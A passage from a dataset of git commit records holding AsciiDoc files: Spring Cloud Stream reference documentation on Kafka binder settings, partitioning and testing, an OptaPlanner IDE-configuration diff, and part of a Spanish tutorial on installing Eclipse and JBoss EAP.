auto-created topics if `autoCreateTopics` is active.\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.autoCreateTopics::\n If set to `true`, the binder will create new topics automatically.\nIf set to `false`, the binder will rely on the topics being already configured.\nIn the latter case, if the topics do not exist, the binder will fail to start.\nOf note, this setting is independent of the `auto.create.topics.enable` setting of the broker and it does not influence it: if the server is set to auto-create topics, they may be created as part of the metadata retrieval request, with default broker settings.\n+\nDefault: `true`.\nspring.cloud.stream.kafka.binder.autoAddPartitions::\n If set to `true`, the binder will add new partitions if required.\nIf set to `false`, the binder will rely on the partition count of the topic being already configured.\nIf the partition count of the target topic is smaller than the expected value, the binder will fail to start.\n+\nDefault: `false`.\n\n\n==== Kafka Consumer Properties\n\nThe following properties are available for Kafka consumers only and\nmust be prefixed with `spring.cloud.stream.kafka.bindings.<channelName>.consumer.`.\n\nautoCommitOffset::\n Whether to autocommit offsets when a message has been processed.\nIf set to `false`, an `Acknowledgment` header will be available in the message headers for late acknowledgment.\n+\nDefault: `true`.\nresetOffsets::\n Whether to reset offsets on the consumer to the value provided by `startOffset`.\n+\nDefault: `false`.\nstartOffset::\n The starting offset for new groups, or when `resetOffsets` is `true`.\nAllowed values: `earliest`, `latest`.\n+\nDefault: null (equivalent to `earliest`).\nenableDlq::\n When set to `true`, it enables DLQ behavior for the consumer.\n Messages that result in errors will be forwarded to a topic named `error.<destination>.<group>`.\n This provides an alternative option to the more common Kafka replay scenario for the case when the number of errors is relatively small and replaying the entire original topic may be too cumbersome.\n+\nDefault: `false`.\n\n==== Kafka Producer Properties\n\nThe following properties are available for Kafka producers only and\nmust be prefixed with `spring.cloud.stream.kafka.bindings.<channelName>.producer.`.\n\nbufferSize::\n Upper limit, in bytes, of how much data the Kafka producer will attempt to batch before sending.\n+\nDefault: `16384`.\nsync::\n Whether the producer is synchronous.\n+\nDefault: `false`.\nbatchTimeout::\n How long the producer will wait before sending in order to allow more messages to accumulate in the same batch.\n(Normally the producer does not wait at all, and simply sends all the messages that accumulated while the previous send was in progress.) A non-zero value may increase throughput at the expense of latency.\n+\nDefault: `0`.\n
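\nAs with the other binder-specific settings, these compose with the channel name; for example, to make the producer on the `output` channel synchronous (a sketch assuming the channel name `output`):\n\n----\nspring.cloud.stream.kafka.bindings.output.producer.sync=true\n----\n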
\n[[contenttypemanagement]]\n== Content Type and Transformation\n\nTo allow you to propagate information about the content type of produced messages, Spring Cloud Stream attaches, by default, a `contentType` header to outbound messages.\nFor middleware that does not directly support headers, Spring Cloud Stream provides its own mechanism of automatically wrapping outbound messages in an envelope of its own.\nFor middleware that does support headers, Spring Cloud Stream applications may receive messages with a given content type from non-Spring Cloud Stream applications.\n\nSpring Cloud Stream can handle messages based on this information in two ways:\n\n* Through its `contentType` settings on inbound and outbound channels\n* Through its argument mapping performed for methods annotated with `@StreamListener`\n\nSpring Cloud Stream allows you to declaratively configure type conversion for inputs and outputs using the `content-type` property of a binding.\nNote that general type conversion may also be accomplished easily by using a transformer inside your application.\nCurrently, Spring Cloud Stream natively supports the following type conversions commonly used in streams:\n\n* *JSON* to\/from *POJO*\n* *JSON* to\/from https:\/\/github.com\/spring-projects\/spring-tuple\/blob\/master\/spring-tuple\/src\/main\/java\/org\/springframework\/tuple\/Tuple.java[org.springframework.tuple.Tuple]\n* *Object* to\/from *byte[]*: either the raw bytes serialized for remote transport, bytes emitted by an application, or converted to bytes using Java serialization (requires the object to be Serializable)\n* *String* to\/from *byte[]*\n* *Object* to *plain text* (invokes the object's _toString()_ method)\n\nWhere _JSON_ represents either a byte array or String payload containing JSON.\nCurrently, Objects may be converted from a JSON byte array or String.\nConverting to JSON always produces a String.\n\n[[mime-types]]\n=== MIME Types\n`content-type` values are parsed as media types, e.g., `application\/json` or `text\/plain;charset=UTF-8`.\nMIME types are especially useful for indicating how to convert to String or byte[] content.\nSpring Cloud Stream also uses MIME type format to represent Java types, using the general type `application\/x-java-object` with a `type` parameter.\nFor example, `application\/x-java-object;type=java.util.Map` or `application\/x-java-object;type=com.bar.Foo` can be set as the `content-type` property of an input binding.\nIn addition, Spring Cloud Stream provides custom MIME types, notably `application\/x-spring-tuple`, to specify a Tuple.\n\n[[mime-types-and-java-types]]\n=== MIME Types and Java Types\n\nThe type conversions Spring Cloud Stream provides out of the box are summarized in the following table:\n\n|===\n|Source Payload |Target Payload |content-type header (source) |content-type (target) |Comments\n\n|POJO\n|JSON String\n|ignored\n|application\/json\n|\n\n|Tuple\n|JSON String\n|ignored\n|application\/json\n|JSON is tailored for Tuple\n\n|POJO\n|String (toString())\n|ignored\n|text\/plain, java.lang.String\n|\n\n|POJO\n|byte[] (java.io serialized)\n|ignored\n|application\/x-java-serialized-object\n|\n\n|JSON byte[] or String\n|POJO\n|application\/json (or none)\n|application\/x-java-object\n|\n\n|byte[] or String\n|Serializable\n|application\/x-java-serialized-object\n|application\/x-java-object\n|\n\n|JSON byte[] or String\n|Tuple\n|application\/json (or 
none)\n|application\/x-spring-tuple\n|\n\n|byte[]\n|String\n|any\n|text\/plain, java.lang.String\n|will apply any Charset specified in the content-type header\n\n|String\n|byte[]\n|any\n|application\/octet-stream\n|will apply any Charset specified in the content-type header\n\n|===\n\n[NOTE]\n====\nConversion applies to payloads that require type conversion.\nFor example, if an application produces an XML string and the outbound `content-type` is set to `application\/json`, the payload will not be converted from XML to JSON.\nThis is because the payload at the application's output channel is already a String, so no conversion will be applied at runtime.\n====\n\n[TIP]\n====\nWhile conversion is supported for both input and output channels, it is especially recommended for the conversion of outbound messages.\nFor the conversion of inbound messages, especially when the target is a POJO, the `@StreamListener` support will perform the conversion automatically.\n====\n\n=== `@StreamListener` and Message Conversion\n\nThe `@StreamListener` annotation provides a convenient way for converting incoming messages without the need to specify the content type of an input channel.\nDuring the dispatching process to methods annotated with `@StreamListener`, a conversion will be applied automatically if the argument requires it.\n\nFor example, suppose that a message with the String content `{\"greeting\":\"Hello, world\"}` and a `content-type` header of `application\/json` is received on the input channel.\nThe following application receives it:\n\n[source,java]\n----\npublic class GreetingMessage {\n\n String greeting;\n\n public String getGreeting() {\n return greeting;\n }\n\n public void setGreeting(String greeting) {\n this.greeting = greeting;\n }\n}\n\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic class GreetingSink {\n\n @StreamListener(Sink.INPUT)\n public void receive(GreetingMessage greeting) {\n \/\/ handle GreetingMessage\n }\n}\n----\n\nThe argument of the method will be populated automatically with the POJO containing the unmarshalled form of the JSON String.\n\n== Inter-Application Communication\n\n=== Connecting Multiple Application Instances\n\nWhile Spring Cloud Stream makes it easy for individual Spring Boot applications to connect to messaging systems, the typical scenario for Spring Cloud Stream is the creation of multi-application pipelines, where microservice applications send data to each other.\nYou can achieve this scenario by correlating the input and output destinations of adjacent applications.\n\nSupposing that a design calls for the Time Source application to send data to the Log Sink application, you can use a common destination named `ticktock` for bindings within both applications.\n\nTime Source will set the following property:\n\n----\nspring.cloud.stream.bindings.output.destination=ticktock\n----\n\nLog Sink will set the following property:\n\n----\nspring.cloud.stream.bindings.input.destination=ticktock\n----\n\n=== Instance Index and Instance Count\n\nWhen scaling up Spring Cloud Stream applications, each instance can receive information about how many other instances of the same application exist and what its own instance index is.\nSpring Cloud Stream does this through the `spring.cloud.stream.instanceCount` and `spring.cloud.stream.instanceIndex` properties.\nFor example, if there are three instances of an HDFS sink application, all three instances will have `spring.cloud.stream.instanceCount` set to `3`, and the individual applications will have `spring.cloud.stream.instanceIndex` set to `0`, `1`, and `2`, respectively.\n
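\nFor instance, the first of the three instances might be launched as follows (a sketch; the jar name is hypothetical):\n\n[source]\n----\njava -jar hdfs-sink.jar --spring.cloud.stream.instanceCount=3 --spring.cloud.stream.instanceIndex=0\n----\n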
In a scaled-up scenario, correct configuration of these two properties is important for addressing partitioning behavior (see below) in general, and the two properties are always required by certain binders (e.g., the Kafka binder) in order to ensure that data are split correctly across multiple consumer instances.\n\n=== Partitioning\n\n==== Configuring Output Bindings for Partitioning\n\nAn output binding is configured to send partitioned data by setting one and only one of its `partitionKeyExpression` or `partitionKeyExtractorClass` properties, as well as its `partitionCount` property.\nFor example, the following is a valid and typical configuration:\n\n----\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n----\n\nBased on the above example configuration, data will be sent to the target partition using the following logic.\n\nA partition key's value is calculated for each message sent to a partitioned output channel based on the `partitionKeyExpression`.\nThe `partitionKeyExpression` is a SpEL expression which is evaluated against the outbound message for extracting the partitioning key.\n\n[TIP]\n====\nIf a SpEL expression is not sufficient for your needs, you can instead calculate the partition key value by setting the property `partitionKeyExtractorClass` to a class which implements the `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` interface (see the sketch at the end of this section).\nWhile the SpEL expression should usually suffice, more complex cases may use the custom implementation strategy.\n====\n\nOnce the partition key is calculated, the partition selection process determines the target partition as a value between `0` and `partitionCount - 1`.\nThe default calculation, applicable in most scenarios, is based on the formula `key.hashCode() % partitionCount`.\nThis can be customized on the binding, either by setting a SpEL expression to be evaluated against the key (via the `partitionSelectorExpression` property) or by setting an `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` implementation (via the `partitionSelectorClass` property).\n\nAdditional properties can be configured for more advanced scenarios, as described in the following section.\n\n[NOTE]\n====\nThe Kafka binder will use the `partitionCount` setting as a hint to create a topic with the given partition count (in conjunction with `minPartitionCount`; the maximum of the two values is used).\nExercise caution when configuring both `minPartitionCount` for a binder and `partitionCount` for an application, as the larger value will be used.\nIf a topic already exists with a smaller partition count and `autoAddPartitions` is disabled (the default), then the binder will fail to start.\nIf a topic already exists with a smaller partition count and `autoAddPartitions` is enabled, new partitions will be added.\nIf a topic already exists with a larger number of partitions than the maximum of `minPartitionCount` and `partitionCount`, the existing partition count will be used.\n====\n\n
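As a sketch of the custom key extraction mentioned in the tip above, a `PartitionKeyExtractorStrategy` implementation could look like the following; the class name and the `customerId` header are hypothetical examples, not part of the framework:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy;\nimport org.springframework.messaging.Message;\n\npublic class CustomerIdKeyExtractor implements PartitionKeyExtractorStrategy {\n\n @Override\n public Object extractKey(Message<?> message) {\n \/\/ derive the partition key from a header, falling back to the payload itself\n Object customerId = message.getHeaders().get(\"customerId\");\n return customerId != null ? customerId : message.getPayload();\n }\n}\n----\n\nThe class would then be referenced on the producer binding via the `partitionKeyExtractorClass` property.\n\n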
==== Configuring Input Bindings for Partitioning\n\nAn input binding is configured to receive partitioned data by setting its `partitioned` property, as well as the `instanceIndex` and `instanceCount` properties on the application itself, as in the following example:\n\n----\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceIndex=3\nspring.cloud.stream.instanceCount=5\n----\n\nThe `instanceCount` value represents the total number of application instances between which the data need to be partitioned, and the `instanceIndex` must be a unique value across the multiple instances, between `0` and `instanceCount - 1`.\nThe instance index helps each application instance to identify the unique partition (or, in the case of Kafka, the partition set) from which it receives data.\nIt is important to set both values correctly in order to ensure that all of the data is consumed and that the application instances receive mutually exclusive datasets.\n\nWhile a scenario in which multiple instances are used for partitioned data processing may be complex to set up in a standalone case, Spring Cloud Data Flow can simplify the process significantly by populating both the input and output values correctly, as well as by relying on the runtime infrastructure to provide information about the instance index and instance count.\n\n== Testing\n\nSpring Cloud Stream provides support for testing your microservice applications without connecting to a messaging system.\nYou can do that by using the `TestSupportBinder`.\nThis is especially useful for unit testing your microservices.\n\nThe `TestSupportBinder` allows users to interact with the bound channels and inspect the messages sent and received by the application.\n\nFor outbound message channels, the `TestSupportBinder` registers a single subscriber and retains the messages emitted by the application in a `MessageCollector`.\nThey can be retrieved during tests and have assertions made against them.\n\nThe user can also send messages to inbound message channels, so that the consumer application can consume the messages.\nThe following example shows how to test both the input and output channels on a processor:\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = ExampleTest.MyProcessor.class)\n@IntegrationTest({\"server.port=-1\"})\n@DirtiesContext\npublic class ExampleTest {\n\n @Autowired\n private Processor processor;\n\n @Autowired\n private BinderFactory<MessageChannel> binderFactory;\n\n @Autowired\n private MessageCollector messageCollector;\n\n @Test\n @SuppressWarnings(\"unchecked\")\n public void testWiring() {\n Message<String> message = new GenericMessage<>(\"hello\");\n processor.input().send(message);\n Message<String> received = (Message<String>) messageCollector.forChannel(processor.output()).poll();\n assertThat(received.getPayload(), equalTo(\"hello world\"));\n }\n\n @SpringBootApplication\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Autowired\n private Processor channels;\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n}\n----\n\nIn the example above, we are creating an application that has an input and an output channel, bound through the `Processor` interface.\nThe bound interface is injected into the test so that we have access to both channels.\nWe send a message on the input channel, and we use the `MessageCollector` provided by Spring Cloud Stream's test support to capture the message that has been sent to the output channel as a result.\nOnce we have received the message, we can validate that the component functions correctly.\n\n== Health Indicator\n\nSpring Cloud Stream provides a health indicator for binders.\nIt is registered under the name of `binders` and can be enabled or disabled by setting the `management.health.binders.enabled` property.\n\n
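For example, the indicator could be switched off in `application.properties`, as in this minimal sketch:\n\n----\n# disable the binders health indicator\nmanagement.health.binders.enabled=false\n----\n\n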
== Samples\n\nFor Spring Cloud Stream samples, please refer to the https:\/\/github.com\/spring-cloud\/spring-cloud-stream-samples[spring-cloud-stream-samples] repository on GitHub.\n\n== Getting Started\n\nTo get started with creating Spring Cloud Stream applications, visit the https:\/\/start.spring.io[Spring Initializr] and create a new Maven project named \"GreetingSource\".\nSelect Spring Boot version 1.3.4 SNAPSHOT and search for and tick the checkbox for Stream Kafka (we will be using Kafka for messaging).\n\nNext, create a new class, `GreetingSource`, in the same package as the `GreetingSourceApplication` class.\nGive it the following code:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.annotation.EnableBinding;\nimport org.springframework.cloud.stream.messaging.Source;\nimport org.springframework.integration.annotation.InboundChannelAdapter;\n\n@EnableBinding(Source.class)\npublic class GreetingSource {\n\n @InboundChannelAdapter(Source.OUTPUT)\n public String greet() {\n return \"hello world \" + System.currentTimeMillis();\n }\n}\n----\n\nThe `@EnableBinding` annotation is what triggers the creation of the Spring Integration infrastructure components.\nSpecifically, it will create a Kafka connection factory, a Kafka outbound channel adapter, and the message channel defined inside the `Source` interface:\n\n[source,java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n\n}\n----\n\nThe auto-configuration also creates a default poller, so that the `greet()` method will be invoked once per second.\nThe standard Spring Integration `@InboundChannelAdapter` annotation sends a message to the source's output channel, using the return value as the payload of the message.\n\nTo test-drive this setup, run a Kafka message broker.\nAn easy way to do this is to use a Docker image:\n\n[source]\n----\n# On OS X\n$ docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \\`docker-machine active\\`` --env ADVERTISED_PORT=9092 spotify\/kafka\n\n# On Linux\n$ docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=localhost --env ADVERTISED_PORT=9092 spotify\/kafka\n----\n\nBuild the application:\n\n----\n.\/mvnw clean package\n----\n\nThe consumer application is coded in a similar manner.\nGo back to Initializr and create another project, named LoggingSink.\nThen create a new class, `LoggingSink`, in the same package as the class `LoggingSinkApplication` and with the following code:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.annotation.EnableBinding;\nimport org.springframework.cloud.stream.annotation.StreamListener;\nimport org.springframework.cloud.stream.messaging.Sink;\n\n@EnableBinding(Sink.class)\npublic class LoggingSink {\n\n @StreamListener(Sink.INPUT)\n public void log(String message) {\n System.out.println(message);\n }\n}\n----\n\nBuild the application:\n\n----\n.\/mvnw clean package\n----\n\nTo connect the GreetingSource application to the LoggingSink application, both applications must use the same destination name.\nStarting up 
both applications as shown below, you will see the consumer application printing \"hello world\" and a timestamp to the console:\n\n[source]\n----\ncd GreetingSource\njava -jar target\/GreetingSource-0.0.1-SNAPSHOT.jar --spring.cloud.stream.bindings.output.destination=mydest\n\ncd LoggingSink\njava -jar target\/LoggingSink-0.0.1-SNAPSHOT.jar --server.port=8090 --spring.cloud.stream.bindings.input.destination=mydest\n----\n\n(The different server port prevents collisions of the HTTP port used to service the Spring Boot Actuator endpoints in the two applications.)\n\nThe output of the LoggingSink application will look something like the following:\n\n[source]\n----\n[ main] s.b.c.e.t.TomcatEmbeddedServletContainer : Tomcat started on port(s): 8090 (http)\n[ main] com.example.LoggingSinkApplication : Started LoggingSinkApplication in 6.828 seconds (JVM running for 7.371)\nhello world 1458595076731\nhello world 1458595077732\nhello world 1458595078733\nhello world 1458595079734\nhello world 1458595080735\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4bc4a46fa5282e61711ccbfc1a7bf39f796af638","subject":"Fix minor issues in IDE configuration instructions","message":"Fix minor issues in IDE configuration instructions\n","repos":"tkobayas\/optaplanner,baldimir\/optaplanner,baldimir\/optaplanner,baldimir\/optaplanner,tkobayas\/optaplanner,baldimir\/optaplanner,tkobayas\/optaplanner,tkobayas\/optaplanner","old_file":"build\/optaplanner-ide-config\/ide-configuration.adoc","new_file":"build\/optaplanner-ide-config\/ide-configuration.adoc","new_contents":"= IDE Setup Instructions\n\nBefore you start contributing, please follow the instructions below to set up a code style for an IDE of your choice.\n\n== Eclipse Setup\n\nOpen the _Preferences_ window, and then navigate to _Java -> Code Style -> Formatter_.\nClick _Import_ and then select the `build\/optaplanner-ide-config\/src\/main\/resources\/eclipse-format.xml` file in the `ide-configuration` directory.\n\nNext navigate to _Java -> Code Style -> Organize Imports_.\nClick Import and select the `build\/optaplanner-ide-config\/src\/main\/resources\/eclipse.importorder` file.\n\n== IDEA Setup\n\nOpen the _Preferences_ window (or _Settings_ depending on your edition), navigate to Plugins and install the https:\/\/plugins.jetbrains.com\/plugin\/6546-eclipse-code-formatter[Eclipse Code Formatter Plugin] from the Marketplace.\n\nRestart your IDE, open the _Preferences_ (or _Settings_) window again and navigate to _Other Settings -> Eclipse Code Formatter_.\n\nSelect _Use the Eclipse Code Formatter_, then change the _Eclipse Java Formatter Config File_ to point to the `eclipse-format.xml`\nfile in the `build\/optaplanner-ide-config\/src\/main\/resources\/` directory.\nMake sure the _Optimize Imports_ box is ticked, and select the `eclipse.importorder` file as the import order config file.\n\n== VS Code setup\n. Open the _Extensions_ window (Ctrl+Shift+X) and search for _Language Support for Java(TM) by Red Hat_ and install it.\n. Create settings file for your workspace\n+\n[source,shell]\n----\ncd optaplanner\nmkdir .vscode\ntouch .vscode\/settings.json\n----\n. 
Put in settings.json the following content:\n+\n[source,json]\n----\n{\n \"java.format.settings.url\": \"build\/optaplanner-ide-config\/src\/main\/resources\/eclipse-format.xml\",\n \"java.completion.importOrder\": [\n \"java\",\n \"javax\",\n \"org\",\n \"com\"\n ]\n}\n----\n\n\n","old_contents":"= IDE Setup Instructions\n\nBefore you start contributing, please follow the instructions below to setup a code style for an IDE of your choice.\n\n== Eclipse Setup\n\nOpen the _Preferences_ window, and then navigate to _Java -> Code Style -> Formatter_.\nClick _Import_ and then select the `build\/optaplanner-ide-config\/src\/main\/resources\/eclipse-format.xml` file in the `ide-configuration` directory.\n\nNext navigate to _Java -> Code Style -> Organize Imports_.\nClick Import and select the `build\/optaplanner-ide-config\/src\/main\/resources\/eclipse.importorder` file.\n\n== IDEA Setup\n\nOpen the _Preferences_ window (or _Settings_ depending on your edition), navigate to Plugins and install the https:\/\/plugins.jetbrains.com\/plugin\/6546-eclipse-code-formatter[Eclipse Code Formatter Plugin] from the Marketplace.\n\nRestart your IDE, open the _Preferences_ (or _Settings_) window again and navigate to _Other Settings -> Eclipse Code Formatter_.\n\nSelect _Use the Eclipse Code Formatter_, then change the _Eclipse Java Formatter Config File_ to point to the `eclipse-format.xml`\nfile in the `build\/optaplanner-ide-config\/src\/main\/resources\/` directory.\nMake sure the _Optimize Imports_ box is ticked, and select the `eclipse.importorder` file as the import order config file.\n\n== VS Code setup\n. Open the _Extentions_ window (Ctrl+Shift+X) and search for _Language Support for Java(TM) by Red Hat_ and install it.\n. Create settings file for your workspace \n+\n----\ncd optaplanner\nmkdir .vscode\ntouch .vscode\/settings.json\n----\n. Put in settings.json the following content:\n\n----\n \"java.format.settings.url\": \"build\/optaplanner-ide-config\/src\/main\/resources\/eclipse-format.xml\",\n \"java.completion.importOrder\": [\n \"java\",\n \"javax\",\n \"com\",\n \"org\"\n ]\n----\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff969860558553d37510fc323d1a61040225c6c5","subject":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","message":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","new_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","new_contents":"= Empezando por el principio. Nuestro banco de trabajo. (2\/2)\nLa metaweb\n:hp-tags: Eclipse, JBoss, JBoss Tools\n:published_at: 2015-04-15\n\nEn esta segunda entrada terminaremos de instalar y configurar el software que nos permitir\u00e1 en adelante construir nuestras propias aplicaciones Java EE. Como IDE optamos por Eclipse, por ser el m\u00e1s extendido. El salto de uno a otro IDE no es algo costoso, ni en tiempo de aprendizaje ni en tiempo de adaptaci\u00f3n del proyecto si los gestionamos bajo Maven o Gradle.\n\nUn IDE debe procurar al desarrollador un entorno que le permita ser lo m\u00e1s productivo posible, ocultando la complejidad de las tecnolog\u00edas empleadas tras el c\u00f3digo fuente generado para resolver las tareas de los documentos de dise\u00f1o del proyecto. 
Un ejemplo lo tenemos cuando creamos un web service, aqu\u00ed el IDE nos generar\u00e1 todas las clases y ficheros necesarios y nosotros s\u00f3lo tendremos que enfocarnos en definir la API e implementar cada operaci\u00f3n.\n\nEn mi experiencia Netbeans es un buen entorno, con muchas ayudas, y maduro en su versi\u00f3n en su versi\u00f3n 8, adem\u00e1s tiene detr\u00e1s a una gran comunidad y a Oracle. Como dato en contra, durante el desarrollo de un proyecto mediano, en la versi\u00f3n 8.0, de cuando en cuando se quedaba \"pensando\" unos segundos. Por otro lado tenemos a JDeveloper, que es el IDE oficial de Oracle, muy potente y una opci\u00f3n recomendable para nuevos proyectos de gran tama\u00f1o, y si desarrollamos contra Oracle, y\/o el servidor Weblogic. Para proyectos Spring est\u00e1 Eclipse STS que ofrece potentes wizards. Si nuestro servidor es JBoss o el nuevo WildFly podemos optar la soluci\u00f3n adoptada aqu\u00ed, Eclipse + JBoss Tools, o directamente por JBoss Developer Studio. La ventaja de optar por Eclipse es que podemos personalizar nuestro entorno instalando los plugins que elijamos. En definitiva tenemos m\u00faltiples opciones y la decisi\u00f3n muchas veces depender\u00e1 de las tecnolog\u00edas que elijamos o nos imponga el tipo de proyecto o el propio cliente.\n\nOk, antes de nada vamos a crear una sencilla estructura de carpetas donde ir guardardo el trabajo, y donde instalar el software. Por ejemplo la siguiente:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig009.png[]\n\nBajo la carpeta `TALLER` creamos las siguientes:\n\n* `BD`: Para las bases de datos que vayamos instalando: MySQL, Derby, etc.\n* `IDE`: Para la instalaci\u00f3n del IDE Eclipse. Instalad otros si quer\u00e9is echarles un vistazo.\n* `Servidor`: Aqu\u00ed ir\u00e1 nuestro JBoss EAP edici\u00f3n Comunity. Aunque si en el futuro vemos algo particular de Java EE 7 instalaremos WildFly o GlassFish. \n* `Workspace`: Para guardar los proyectos desarrollados en Eclipse.\n\nEl fichero comprimido es simplemente una forma r\u00e1pida de hacer una copia de seguridad del workspace.\n\nPara instalar Eclipse, os aconsejo de nuevo que lo hag\u00e1is en Ingl\u00e9s, vamos a la p\u00e1gina https:\/\/www.eclipse.org\/downloads\/ y elegimos la instalaci\u00f3n para desarrolladores de Java EE.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig010.png[]\n\nBajamos el fichero `.zip`, lo copiamos en la carpeta `c:\\TALLER\\IDE\\` y seleccionamos Extraer aqu\u00ed, no hay programa de instalaci\u00f3n. Entramos en la carpeta de Eclipse y doble click en `eclipse.exe`. Seleccionamos la carpeta `c:\\TALLER\\workspace\\` como espacio de trabajo. El IDE se carga y cerramos la pantalla inicial de bienvenida pulsando en el icono en la esquina arriba a la derecha.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig015.png[]\n\nNOTE: No marqu\u00e9is el check `Use this as the default and do not ask again` para as\u00ed cambiar el workspace si quer\u00e9is en un futuro. Si lo marc\u00e1is pod\u00e9is volver a ver la pantalla de selecci\u00f3n de la carpeta del workspace configur\u00e1ndolo en `Window > Preferences > General > Startup and Shutdown > Workspaces`.\n\nAhora le toca al servidor. Nuestro entorno de trabajo necesita un servidor completo para depurar el c\u00f3digo que estemos desarrollando. 
Navegamos a la p\u00e1gina oficial del servidor JBoss en http:\/\/www.redhat.com\/en\/technologies\/jboss-middleware\/application-platform y pulsamos el bot\u00f3n `TRY IT NOW` dentro de la pesta\u00f1a `TRY`, seleccionada por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig020.png[]\n\nEsto nos lleva a la p\u00e1gina del servidor JBoss para desarrolladores.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig022.png[]\n\nElegimos nuestro sistema operativo y pulsamos sobre el enlace del installer. Si no estamos ya logados saltaremos a la p\u00e1gina de introducci\u00f3n de usuario y contrse\u00f1a. Procedemos a la creaci\u00f3n de una cuenta pulsando el enlace `Create Account`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n\nDespu\u00e9s de introducir una serie de datos b\u00e1sicos aceptamos los t\u00e9rminos del Programa de Desarrollador de Jboss. Esperamos a que la bajada del fichero acabe. Copiamos el fichero en la carpeta `C:\\TALLER\\Servidor\\` y lo arrancamos escribiendo el comando `java -jar jboss-eap-6.3.0-installer.jar`.\n\nSe iniciar\u00e1 un sencillo wizard de instalaci\u00f3n. Si os aparece un mensaje acerca del Firewall de Windows elegid la opci\u00f3n `Permitir`. A la hora de elegir la carpeta de instalaci\u00f3n seleccionad como antes, `C:\\TALLER\\Servidor\\`. Escribimos luego un nombre de usuario y una contrase\u00f1a. Estas credenciales son las del usuario administrador del servidor, que lo gestionar\u00e1 a trav\u00e9s del navegador usando la Consola de Administraci\u00f3n. Apuntad en un sitio seguro estos datos para no olvidarlos. En la instalaci\u00f3n de este servidor se eligieron las credenciales:\n\n[cols=\"1h,2\", width=\"40\"]\n|===\n|user\n|admin\n\n|password\n|abcd-1234\n|===\n\nEs interesante instalar tambi\u00e9n los ejemplos que trae el servidor. Son varios proyectos Maven que muestran ejemplos sencillos sobre el uso de las diferentes tecnolog\u00edas Java EE incidiendo en las gestionadas desde Red Hat: JPA (Hibernate), CDI (Weld), EJB, JSF, etc. Si abrimos el `pom.xml` de alguno de estos proyectos veremos como se definen de las dependencias en proyectos que se despliegan en el servidor JBoss.\n\nEl wizard contin\u00faa por una serie de pantallas donde dejamos las opciones por defecto, la instalaci\u00f3n finaliza a los pocos segundos. Y ya tenemos instalado un flamante servidor Java EE 6 en local. Podemos finalmente guardar y echar un vistazo al script de instalaci\u00f3n.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig030.png[]\n\nComprobaremos que la instalaci\u00f3n es correcta desplegando la aplicaci\u00f3n web _Hello World!_ localizada en los ejemplos reci\u00e9n instalados. Para arrancar manualmente el servidor abrimos una consola de comandos, vamos a la carpeta `bin\\` dentro de la carpeta del servidor y lo iniciamos escribiendo `standalone.bat`. Es importante no cerrar la ventana de comandos ya que si lo hacemos el proceso en que se ejectuta el servidor se terminar\u00e1 y \u00e9ste se parar\u00e1. 
As\u00ed que dejamos la ventana de comandos abierta, aunque s\u00ed podemos minimizarla.\n\nNOTE: Si antes no instalaste los ejemplos del servidor puedes bajarlos ahora en el enlace https:\/\/github.com\/jboss-developer\/jboss-eap-quickstarts\/archive\/6.3.0.GA.zip[jboss-eap-quickstarts-6.3.0.GA.zip]. Otra alternativa es obtener la aplicaci\u00f3n desde Maven a partir del arquetipo `maven-archetype-site-simple`. Puedes consultar el Post anterior para recordar c\u00f3mo lo hicimos.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig035.png[]\n\nAhora abrimos otra consola de comandos y situamos en la carpeta del proyecto web helloworld `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig040.png[]\n\nDentro de la carpeta del proyecto Maven escribimos el comando `mvn clean install jboss-as:deploy`. Se inicia la bajada de los artefactos de dependencias y plugins necesarios y finalmente el comando se ejecuta. Con una sola l\u00ednea de comando hemos llevado a cabo todo el ciclo de construcci\u00f3n del proyecto incluyendo el despliegue de la aplicaci\u00f3n en nuestro reci\u00e9n instalado servidor. A\u00fan con un proyecto tan 